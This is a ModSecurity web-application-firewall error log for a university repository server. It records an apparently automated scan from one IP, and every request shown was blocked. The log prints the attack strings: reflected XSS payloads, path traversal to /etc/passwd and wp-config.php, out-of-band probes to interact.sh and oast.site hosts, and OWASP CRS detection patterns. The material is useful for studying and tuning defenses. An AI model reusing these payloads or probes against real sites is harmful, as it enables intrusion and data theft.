[Tue Aug 29 11:55:46.664546 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAq5@FkAAAAK"]
[Tue Aug 29 11:55:46.751268 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAqY6JAAAAAr"]
[Tue Aug 29 11:55:46.774982 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAqY6JEAAAAr"]
[Tue Aug 29 11:55:47.667446 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAolKwwAAAAe"]
[Tue Aug 29 11:55:48.541231 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAq-HYsAAAAT"]
[Tue Aug 29 11:55:48.703226 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAq@saQAAAAM"]
[Tue Aug 29 11:55:51.767081 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16V8Co-f0AAAqY6K0AAAAr"]
[Tue Aug 29 11:55:52.124665 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAApbUp0AAAAh"]
[Tue Aug 29 11:55:52.302537 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0bd55sp8pkbeny.oast.site found within TX:1: cjmnijtjmimvgniikdb0bd55sp8pkbeny.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAAq4fYMAAAAJ"]
[Tue Aug 29 11:55:52.704722 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0da6dgyafqxhna.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0da6dgyafqxhna.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAAolKycAAAAe"]
[Tue Aug 29 11:55:53.584697 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WcCo-f0AAAqTvzEAAAAa"]
[Tue Aug 29 11:55:53.878754 2023] [:error] [pid 2755] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0dtq9mfku1ximt.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0dtq9mfku1ximt.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAArD6bgAAAAX"]
[Tue Aug 29 11:55:53.900545 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAArC7akAAAAW"]
[Tue Aug 29 11:55:53.922555 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAqeFegAAAAx"]
[Tue Aug 29 11:55:55.840919 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAAqTvz8AAAAa"]
[Tue Aug 29 11:55:56.595382 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAAq5@HsAAAAK"]
[Tue Aug 29 11:55:56.727160 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAArC7b0AAAAW"]
[Tue Aug 29 11:55:57.701430 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqSw24AAAAN"]
[Tue Aug 29 11:55:58.688679 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAAq5@I0AAAAK"]
[Tue Aug 29 11:55:59.539315 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16X8Co-f0AAArC7ckAAAAW"]
[Tue Aug 29 11:55:59.793043 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16X8Co-f0AAAq5@JQAAAAK"]
[Tue Aug 29 11:56:01.600715 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAqY6OQAAAAr"]
[Tue Aug 29 11:56:01.622504 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAAq5@KYAAAAK"]
[Tue Aug 29 11:56:01.634660 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAApa-RIAAAAg"]
[Tue Aug 29 11:56:02.627757 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAqY6OwAAAAr"]
[Tue Aug 29 11:56:02.782586 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqeFhEAAAAx"]
[Tue Aug 29 11:56:03.723060 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAApa-R0AAAAg"]
[Tue Aug 29 11:56:03.735602 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAAqeFhgAAAAx"]
[Tue Aug 29 11:56:04.593610 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAArC7eYAAAAW"]
[Tue Aug 29 11:56:04.648814 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAAqSw5sAAAAN"]
[Tue Aug 29 11:56:04.695072 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAAqeFiEAAAAx"]
